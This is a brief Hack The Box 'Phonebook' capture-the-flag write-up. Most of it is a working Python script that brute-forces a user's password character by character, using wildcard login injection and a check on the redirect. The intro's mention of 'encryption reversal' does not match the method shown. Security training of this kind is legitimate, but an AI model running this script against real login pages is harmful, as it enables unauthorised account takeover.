HackTheBox Phonebook Writeup
Explore the basics of cybersecurity in the Phonebook Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests
import sys
if len(sys.argv) < 2:
print("Usage: python script.py <url>")
sys.exit(1)
username = "reese"
login_url = f"http://{sys.argv[1]}/login"
characters = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]}{1234567890"
def create_session():
return requests.Session()
def try_login(user, pw, session):
headers = {
'X-Forwarded-For': pw,
'Referer': login_url
}
data = {
"username": user,
"password": pw
}
response = session.post(login_url, headers=headers, data=data, allow_redirects=False)
return 'location' not in response.headers or '/login' not in response.headers.get('location', '')
def force_one(prefix, session):
for x in characters:
if try_login(username, prefix + x + "*", session):
return x
return ''
def forcer():
got = ""
session = create_session()
while True:
next_char = force_one(got, session)
if not next_char:
break
got += next_char
print(got)
forcer()
Summary
Phonebook is an easy-level challenge on Hack The Box that exploits a web application’s login functionality using username enumeration and blind password brute-forcing. The script automates guessing the password for the reese user by leveraging HTTP headers (X-Forwarded-For and Referer) and observing redirection responses.
By iterating through a set of possible characters and appending matching ones to the password prefix, the script reconstructs the password character by character. This challenge demonstrates the risks of improper authentication mechanisms and highlights the need for secure login implementations.